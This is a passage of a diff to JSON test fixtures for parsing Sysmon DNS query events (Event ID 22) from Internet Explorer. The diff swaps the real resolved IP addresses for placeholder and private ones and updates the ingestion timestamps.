"2001:503:d414::30", - "192.42.93.30", + "192.168.93.30", "2001:503:eea3::30", - "192.54.112.30", + "192.168.112.30", "2001:502:8cc::30", - "192.43.172.30", + "192.168.172.30", "2001:503:39c1::30", - "192.48.79.30", + "192.168.79.30", "2001:502:7094::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742483100Z", + "ingested": "2021-12-09T13:50:23.457569Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18404,55 +18160,55 @@ "type": "CNAME" }, { - "data": "124.146.215.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.53", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.46", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.52", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.48", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.45", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.54", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.47", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.42", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.55", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18461,19 +18217,19 @@ } ], "resolved_ip": [ - "124.146.215.43", - "202.241.208.53", - "124.146.215.46", - "202.241.208.52", - "124.146.215.48", - "124.146.215.45", - "202.241.208.54", - "124.146.215.47", - "124.146.215.42", - "124.146.215.44", - "202.241.208.55", - "202.241.208.56", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, @@ -18490,26 +18246,15 @@ "tg.socdm.com" ], "ip": [ - "124.146.215.43", - "202.241.208.53", - "124.146.215.46", - "202.241.208.52", - "124.146.215.48", - "124.146.215.45", - "202.241.208.54", - "124.146.215.47", - "124.146.215.42", - "124.146.215.44", - "202.241.208.55", - "202.241.208.56", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742491500Z", + "ingested": "2021-12-09T13:50:23.457574800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18580,12 +18325,12 @@ "type": "CNAME" }, { - "data": "68.67.153.75", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "68.67.153.75" + "89.160.20.156" ] }, "network": { @@ -18601,13 +18346,13 @@ "prebid.adnxs.com" ], "ip": [ - "68.67.153.75" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742499900Z", + "ingested": "2021-12-09T13:50:23.457580700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18679,12 +18424,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -18702,13 +18447,13 @@ "ul1.dvtps.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742508300Z", + "ingested": "2021-12-09T13:50:23.457586600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18780,7 +18525,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742516800Z", + "ingested": "2021-12-09T13:50:23.457592300Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067946300Z'/\u003e\u003cEventRecordID\u003e200\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.912\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -18850,12 +18595,12 @@ "type": "CNAME" }, { - "data": "23.3.125.199", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.3.125.199" + "89.160.20.156" ] }, "network": { @@ -18872,13 +18617,13 @@ "tags.bluekai.com" ], "ip": [ - "23.3.125.199" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742525300Z", + "ingested": "2021-12-09T13:50:23.457598100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.068Z", @@ -18938,27 +18683,27 @@ }, "answers": [ { - "data": "104.19.195.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.199.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.198.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.197.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.196.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18966,7 +18711,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -18974,7 +18719,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -18982,23 +18727,23 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "104.19.195.151", - "104.19.199.151", - "104.19.198.151", - "104.19.197.151", - "104.19.196.151", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -19013,24 +18758,20 @@ "cdnjs.cloudflare.com" ], "ip": [ - "104.19.195.151", - "104.19.199.151", - "104.19.198.151", - "104.19.197.151", - "104.19.196.151", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742533800Z", + "ingested": "2021-12-09T13:50:23.457603900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData 